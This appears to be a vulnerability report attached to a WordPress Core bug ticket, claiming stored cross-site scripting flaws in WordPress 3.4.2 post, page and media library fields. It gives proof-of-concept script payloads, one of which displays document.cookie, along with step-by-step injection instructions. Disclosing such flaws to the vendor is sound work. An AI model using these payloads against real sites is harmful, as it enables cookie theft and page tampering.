WordPress.org

Make WordPress Core

Ticket #21917: Wordpress XSS Vuln.txt

File Wordpress XSS Vuln.txt, 2.3 KB (added by nuxbie, 19 months ago)
Line 
1[ Wordpress 3.4.2 - Multiple XSS Vulnerability ]
2
3Hello, my name is Catur Febrian (nuxbie).
4I have bugs at new webapps wordpress (last version).
5This bugs is XSS (Cross Site Scripting).
6Wordpress 3.4.2 have a multiple vuln.
71. XSS WP-Post.
82. XSS WP-Page.
93. XSS WP-MediaLibrary.
10
11Please, read my exploit report... :-)
12
13Exploit Title: CMS Wordpress - Multiple XSS Vulnerability
14Author       : TheCyberNuxbie [ Catur Febrian ]
15E-mail       : root@31337sec.com
16Version CMS  : Version 3.4.2 (Last Version)
17Category     : WebApps / Content Management System (CMS)
18Security Risk: Medium Level
19Link Downlaod: http://www.wordpress.org/
20Tested On    : Mozilla Firefox + Xampp + Windows 7 x32 ID
21
22[ Information Content ]
23WordPress - Web Publishing Software.
24http://www.wordpress.org/
25
26[ Vulnerability Details ]
271. XSS WP-Post.
282. XSS WP-Page.
293. XSS WP-MediaLibrary.
30
31[ XSS CODE ]
32<script>alert('31337');</script>
33<script>alert(document.cookie);</script>
34<script>window.open("http://www.google.com/")</script>
35
36- Exploit Report:
371. Create / Edit WP-Post:
38Input "Title Post" with Script XSS.
39<script>alert('31337');</script>
40http://wordpress/wp-admin/post-new.php <--- Publish.
41View XSS: http://wordpress/?p=xxx <--- XSSed.
42PIC: http://31337sec.com/wordpress/xss-post1.jpg + http://31337sec.com/wordpress/xss-post2.jpg
43
442. Create / Edit WP-Page:
45Input "Title Page" with Script XSS.
46<script>alert('31337');</script>
47http://wordpress/wp-admin/post-new.php?post_type=page <--- Publish.
48View XSS: http://wordpress/?page_id=xxx <--- XSSed.
49PIC: http://31337sec.com/wordpress/xss-page1.jpg + http://31337sec.com/wordpress/xss-page2.jpg
50
513. Add / Edit WP-Media Library:
52Upload files via Media Library.
53http://wordpress/wp-admin/media-new.php <--- Select File.
54Upload Files, Save...!!!
55Input Form "Title", "Caption", "Description" with Script XSS <--- Save All Changes.
56View XSS: http://wordpress/?attachment_id=xxx <--- XSSed.
57PIC: http://31337sec.com/wordpress/xss-media1.jpg + http://31337sec.com/wordpress/xss-media2.jpg + http://31337sec.com/wordpress/xss-media3.jpg
58
59- Script XSS will be affacted:
601. Frontend Website (post).
61http://wordpress/?p=xxx <--- XSSed.
622. Frontend Website (page).
63http://wordpress/?page_id=xxx <--- XSSed.
643. Frontend Website (attachment).
65http://wordpress/?attachment_id=xxx <--- XSSed.
66
67Thanks...
68TheCyberNuxbie